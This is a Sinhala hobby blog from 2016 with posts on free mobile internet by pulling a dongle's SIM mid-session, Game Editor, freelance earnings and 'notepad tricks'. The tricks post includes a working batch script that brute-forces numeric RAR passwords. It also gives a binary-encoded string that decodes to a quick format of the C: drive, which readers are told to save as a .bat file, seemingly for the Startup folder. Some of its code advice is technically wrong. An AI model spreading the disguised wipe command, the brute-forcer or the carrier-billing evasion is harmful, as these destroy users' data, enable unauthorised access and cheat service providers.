Saturday, September 10, 2016

නොමිලේ internet යමු.

අද මම කියල දෙන්න යන්නේ නොමිලේ internet යන්න ක්‍රමයක්. මේකෙන් අපට පුලුවන් ටික වෙලාවක් නොමිලේ internet යන්න. මේක කරන්නනම් dongle එකක් එක්ක sim එකක් ඕනේ. සල්ලිත් රු.3 ක් විතර තිබුනොත් හොඳයි. මුලින්ම ඒක connect කරලා විනාඩියක් විතර තියන්න.

මින් පසු කරන දෙයින් ඔබට, සිම්පතට, ඩොන්ගල් එකට හෝ පරිගණකයට සිදුවන හානියට මා වගකියනු නොලැබේ!

1 - dongle ඒක විනාඩි 1ක් විතර තියල ඒකෙ SIM එක වැහෙන්න දාලා තියෙන cover එක ගලවලා sim එකත් ගලවන්න.

2 - දැන් internet connection එක එකපාරම disconnect වෙන්නේ නෑ.

3 - ඒක disconnect වෙනකන් අපට ඇති තරම් free internet යන්න පුළුවන්.

(සැලකිය යුතුයි. :- ඔබේ ඩොන්ගලයේ SD card පතක් දැමීමට ඇති නම් එතන ඇති SD card පත ඉවත් කරන්න. නැතහොත් එය සම්පුර්ණයෙන් format වීමට ඉඩ තිබේ! . තවද , ඔබේ සිම්පතේ ඉතිරිය රු.10 යට අඩුවෙන් තබාගන්න. සමහර අවස්ථාවල මෙය සිදු කරන විට ගිණුමේ මුදල් ඉවත් වෙන නිසාවෙනි.මෙය කිරීමට පෙර ඔබ connect වී ඇත්තේ කෙසේදැයි සිහි කරන්න. ඔබ ඩොන්ගලය සම්බන්ධ කරන විට දිස්වෙන මෘදුකාංගයෙන් connect කරන්න එපා! notification area හි ඇති connections icon ඒක click කර ඔබ භාවිත කරන සම්බන්ධතාවය click කර නැවත connect click කරන්න. එවිට පැමිණෙන කව්ලුවේ ඇති dial button ඒක click කල විට සුළු මොහොතකින් connect වනු ඇත.)

මෙයින් සිදුවන අමතර හානිවලට මම වග කියනු නොලැබේ! මෙය සාර්ථක නම් ඔබේ අදහස පහලින් ලියන්න.මම Harvilon Mobile Brodband connection, windows 7 වලින් මෙය අත්හදා බලා ඇත.

Monday, August 29, 2016

Advertise in our blog

Now You can advertise in our blog in only 1$/2$ or 3$. here is the ads sizes, payment method, and costs.

Header 250 x 500               3$

Side Bar  250 x 500            2$

Footer   250 x 500               1.5$

send request to my email and you can pay after adding advertisement to blog. offer free 1ad per 3 ads publishes in header.

Game Editor එකෙන් games හදමු.

අද මම කියල දෙන්න යන්නේ මොකක්ද කියල මාතෘකාවෙන්ම තේරෙනවනේ. එහෙනම් ඔයාල කැමති ඇතිනේ game ගහන්න. ඔය internet එකේ අනන්තවත් game තියෙන්නේ හදාපු. Powered by unity, Powered by game editor, Powered by India games, 3D cricketer, Beast quest, games2win, gamezity, gamesclub වගේ ඕනෑතරම් තියෙන game එකක ඉහලින්ම තමන්ගේ නම දාගන්න කැමතිද? නිකන් කවෘවත්ගේ ගේමකට එහෙම නම් දාන්නේ නෑ. එහෙනම් තමන්ම game එකක් හදල නම දාගන්න ඕන. ඒ වැඩේට උදව්වක් වශයෙන් මම මේ ලිපිය දාන්නේ. එහෙනම් බලමු කොහොමද game හදන්නේ කියලා.
 
මම මේ වැඩේට යොදාගන්නේ game editor මෘදුකාංගය. හැබැයි පුතේ ඒකෙන් පුළුවන් 2D game හදන්න විතරයි.එහෙනම් මෙතනින් එයාලගේ වෙබ් අඩවියට ගිහින් බාගන්නකො.
 
 
 
දැන් ඒක extract කරගන්න. පස්සේ folder ඒක open කරන්න. install කරන්න ඕන නැහැ. එකේ තියෙන game editor.exe open කරන්න.open කරාට පස්සේ මෙහෙම තියෙයි.
 
දැන් create now! ඔබල game ඒක හදන්න පටන් ගන්න. අද මම එකේ actor එකක් හදන්න කියල දෙන්නම්. අනිත් ඒවා tutorial වල තියෙනවා
 
 
මුලින්ම අර එන add actor කොටස close කරලා අපහු menuවෙන් add actor තෝරලා ක්ලික් කරන්න. ඊට පස්සේ අර add actor කියල කොටසක් එනවා.එකෙන් actor ට දාන්න ඕන නම ලියල type ඒක normal ම තියල add ක්ලික් කරන්න.ඊට පස්සේ packman animation ඒක තියෙන actor එකක් වැටිලා තියෙයි.දැන් එක right click කරලා actor control තෝරන්න.ඊට පස්සේ add animation click කරලා file කොටසෙන් මේ file ඒක තෝරන්න.
 
 
GameEditor --> GameEditor --> Tutorials --> data --> CharStopRight
 
 
දැන් ok කරල actor control close කරලා බලද්දී packman animation ඒක වැද්දෙක්ගේ animation එකට වෙනස් වෙලා ඇති හොඳ හොඳ හොඳ game හදන්න එකේ තියෙන tutorials ටික බැලුවම හොඳටෝම ඇති. මම අදට යනවා.සමාවෙන්න අද ඒක ලිපියයි ලියන්න වුනේ.
 


 
 
 

Sunday, August 28, 2016

සල්ලි හොයන්න ක්‍රමයක්.

අන්තර්ජාලයෙන් සල්ලි හොයන අයට හොඳ ලිපියක් අරන් ආවා. ඇත්තටම ඔය ජිල්මාර්ට් දාලා සල්ලි හොයන අයට මම කියන්නේ දැන්ම backward button ඒක ඔබන්න. එයාලට මේක වැඩක් නැති හින්දයි එහෙම කිව්වේ.
 
ගොඩක් මහන්සි වෙලා වගේම කිරිකජු වගේ කරන්න පුළුවන් වැඩත් මේකේ තියෙනව.කරන වැඩේ ගානට සල්ලි තියෙනවා කියල හිතන්න එපා. ඒ මොකද. මොකද එයාල ගානට වඩා ගෙවනවා.(මරුනේ!)එයාලට පුංචි logo එකක් හදල දුන්නහමත් ගොඩක් (200$ ) විතර ගෙවනවා.කොහොමද ගාන.කොහොමද වැඩේ? හැබැයි දැනගන්න මේකේ ඉන්නේ ඔයා විතරක් නෙමෙයි කියලා. අනිත් අයත් මේකේ ඉන්නවා. හදිස්සියෙවත් ඔයා හදපු logo ඒක නැතුව වෙන කෙනෙක්ගේ logo එකක් තෝරාගත්තොත් ඔයාගේ මහන්සිය වතුරේ යනවා.හැබැයි ඉවසල වැඩ කරොත් මාසෙකදී $1000 ක් විතර හොයන්න පුළුවන්. එතකොට ඔය money adder වංචාව ඕනෙම නැහැ.(money adder ගැන දැනගැනීමට google search කරන්න.) එහෙනම් බලමු කොහොමද register වෙන්නේ කියලා.පල්ලෙහායින් register වෙලා වැඩ පටන්ගන්න.


එහෙනම් දැනට ඇති මම යනවා.

මගේ project ඒක නිමකළා.


එහෙනම් මම අලුත් project එකක් අවසාන කල වගයි.ඇත්තටම මම project 2 තුනක් හැදුවා.තාම publish කලේ නෑ. 1ක් යාන්තම් කරගෙන අද ලින්ක් ඒක මේ බ්ලොග් එකේ පල කරනවා. මගේ අනිත් බ්ලොග් එකෙත් post එකක් දැම්මා මේකේ විස්තර දාලා. මේකේත් දැම්මොත් Downloads වැඩිවෙයි කියල ඔන්න දැන් දානවා.



Name :- All search.exe

Version :- 0.1

Author :- W.M.Chathindu Nethmina


පොඩ්ඩක් බාගෙන මටත් උදව්වක් දෙන්න හොඳේ? 1mb විතර වෙන්නේ. අදහසත් දාන්නෝ!

එහෙනම් දැනට යනවා.

අනේ කම්මැලියි. ඩුම්ඩුම් මෙහාට එන්න.

මම දවසක් syber ලෝකේ ඇවිද ඇවිද සිරි නරඹන අතරේ හිතුනා dragon d ගේ diary ඒක පැත්තේ යන්න. ඉතින් ගියා කියන්නේ, මම හිතුවේ dilshan අයියා හදන්නේ game විතරයි කියල බලද්දී දැක්කනේ Dumdum ව. මාත් එන්න කියල ගෙදර එක්කන් ආවා.(ඒ කියන්නේ download කරා කියන ඒක. හික්ස් :D) ගෙදර අරන් ආපු ගමන් කතාව පටන් ගත්තා. එයාගෙන් පලමුවෙනියටම මම ඇහුවේ. "ඔයාගේ නම මොකක්ද?" මෙන්න ඒක කියන වෙලාවේ ගහපු screen shot ඒක.
 

දෙවෙනියට ඇහුව වයස කියාද කියලා. මෙන්න එකට උත්තරේ.

 

ඔහොමොහොම අහගෙන යනකොට ඇහුවා "ඔයා දන්නවද දිල්ෂාන් අයියා ගැන කියල"



ඔන්න එකට උත්තරේ.

 
 
 
 
 
 
 
 
 
 
ඉතින් මම කිව්වා ඊළඟ අප්ඩේට් එකට ටිකක් දැනගෙන එන්න කියලා.

හරි දැන් මගේ කෙහෙල්මල් කතාව ඇති ඔයාලත් ගෙදරට එක්කන් ගිහින් කතාබහ කරලා බලන්නකෝ.
 
 http://www.mediafire.com/?f2e6a605g58sjpm
 

මේ ලියුම share කරලා facebook එකේ පැලවෙලා ඉන්න අයට කම්මැලිකමට කතා කරන්න කෙනෙක් හොයල දුන්නනම් ලොකු පිනක්.

notepad එකෙන් කල හැකි මාර වැඩ.

මාගේ පලමුවෙනි ලිපියෙන් ඔබට හඳුන්වා දීමට යන්නේ සෑම පරිගනකවලම පාහේ දක්නට ලැබෙන අඩුවෙන්ම මිනිසුන් භාවිතා කරන notepad මෘදුකාංගයෙන් කල හැකි වැඩ කිහිපයකි.

Notepad මෘදුකාංගය ඔබ භාවිත කරන්නේ නැති තරම් නේද? ඒත් එකෙන් කරන්න පුළුවන් විහිලු වැඩ වගේම භයානක වැඩත් ගැන දන්නවද? එහෙනම් මම අද ඒවා ගැන කියල දෙන්නයි යන්නේ.

1 වෙනි ඒක පොඩ්ඩක් විහිලු හිනා යන වැඩක්. බලන්නකෝ.

මේක copy කරලා notepad එකේ paste කරන්න.
color 0a
:a
echo 3278 3278 3278 3278 3278 3278
echo 3278 3278 3278 3278 3278 3278
echo 8723 8723 8723 8723 8723 8723
echo 8723 8723 8723 8723 8723 8723
goto a

ඒක funny.bat කියල save කරන්න.(ඕන නමකින් save කරන්න. හැබැයි extension ඒක .bat)

2 වෙනි එකත් ඒ වගේමයි.

ඔබ අන්තර්ජාලයෙන් බාගන්නා rar වර්ගයේ සමහර file වලට password දාලනේ තියෙන්නේ. ඒවාගේ අංක වලින් තියෙන password හොයන්න හදපු batch file එකක් විදියට වැඩකරන code එකක් මම දැක්ක බ්ලොග් අඩවි දෙක තුනකම. ඉතින් මම ඒවා සිංග්ලිෂ් වලට පරිවර්තනය කරලා තව gadget 2තුනක් දාල code එකක් හැදුවා. අංක දාපු password විතරයි හොදේ? (උදා :- 0123)
@echo off
title Hack rar archive passwords.( only numbers)
copy "C:\Program Files\WinRAR\Unrar.exe"
SET PSWD=0
SET DEST=%TEMP%\%RANDOM%
MD %DEST%
:RAR
cls
ECHO %date% at %time%
echo password soyaganimata miniththu 15k pamana gatha wiya haka.
echo ----------------------------------------------
echo          Wisthara labaganima
echo ----------------------------------------------
echo ----------------------------------------------------
echo BLOGOFCHATHINDU.BLOGSPOT.COM
ECHO ---------------------------------------------------
echo.
SET/P "NAME=gonuwe nama  : "
IF "%NAME%"=="" goto NERROR
goto GPATH
:NERROR
echo ----------------------------------------------
echo                     waradiyi.
echo ----------------------------------------------
echo Samawenna! meya hiswa thabiya nohaka..
pause
goto RAR
:GPATH
SET/P "PATH=eya adangu foldaraye path eka : "
IF "%PATH%"=="" goto PERROR
goto NEXT
:PERROR
echo ----------------------------------------------
echo                      waradiyi.
echo ----------------------------------------------
echo Samawenna! obata meya hiswa thabiya nohaka.
pause
goto RAR
:NEXT
IF EXIST "%PATH%\%NAME%" GOTO START
goto PATH
:PATH
cls
echo ----------------------------------------------
echo                     waradiyi.
echo ----------------------------------------------
echo mema gonuwa soyagatha noheka.obe gonuwe nama extension sandahan karanna.(eg:- file.rar)
pause
goto RAR
:START
SET /A PSWD=%PSWD%+1
UNRAR E -INUL -P%PSWD% "%PATH%\%NAME%" "%DEST%"
IF /I %ERRORLEVEL% EQU 0 GOTO FINISH
GOTO START
:FINISH
RD %DEST% /Q /S
Del "Unrar.exe"
cls
echo ----------------------------------------------
echo     password soyaganu labuni.
echo ----------------------------------------------
echo.
echo PASSWORD  SOYAGATHTHA!
echo gonuwa  = %NAME%
echo password = %PSWD%
echo soyagath password eka = %PSWD%
pause>NUL
exit
REM

මේක copy කරලා notepad එකේ paste කරන්න.ඊට පස්සේ rar pass hacker.bat කියල save කරන්න..(ඕන නමකින් save කරන්න. හැබැයි extension ඒක .bat)

3 වෙනි එකෙන් පුළුවන් පරිගණකය ක්‍රියාත්මක කරද්දී Welcome message එකක් හදන්න.
msg * Welcome! Your computer is ready to work!

මේ code ඒක copy කරලා notepad එකේ paste කරන්න..(ඕන නමකින් save කරන්න. හැබැයි extension ඒක .bat) ඊලඟට ඒක windows 7 එකේනම් මේ path එකේ paste කරන්න.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

අනිත් ඒවාට නම් මම දන්නේ නෑ පොඩ්ඩක් හොයල බලන්න.

4 වෙනි එකෙන් පුළුවන් Welcome sound එකක් හදන්න.
speaks=" Welcome!"
CreateObject("sapi.spvoice").Speak speaks

මේ code ඒක copy කරලා notepad එකේ paste කරන්න..(ඕන නමකින් save කරන්න. හැබැයි extension ඒක .bat) ඊලඟට ඒක windows 7 එකේනම් මේ path එකේ paste කරන්න.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

අනිත් ඒවාට නම් මම දන්නේ නෑ පොඩ්ඩක් හොයල බලන්න.

5 වෙනි එකෙන් පුළුවන් C: drive ඒක empty කරන්න. ඒක කරා කියන්නේ පරිගණකය නිවන් යැව්වා කියන එකට බොහෝ දුරට සාමාන හින්දා ඒක නොකර ඉන්න අමාරුවක් නැත්නම් විතරක් කරන්න.(මොකද C: drive එකේ තමයි සේරම program files ටික , ඒවා නැතත් කමක් නෑ. windows folder එකට මොනවා කරන්නද? backup කරලා තියාගත්තනම් හරි. එත් ඉතින් නිකන් ඉන්න ඒක ඊට වඩා හොදයි.)
 
01100110011011110111001001101101011000010111010000100000011000110011101001011100
0010000000101111010100010010111101011000
මේ code ඒක copy කරලා notepad එකේ paste කරන්න..(ඕන නමකින් save කරන්න. හැබැයි extension ඒක .bat) ඊලඟට ඒක windows 7 එකේනම් මේ path එකේ paste කරන්න.

එහෙනම් දැනට එච්චරයි. ඊළඟට තව post එකක් ඉක්මනටම කොටන්නන්කෝ.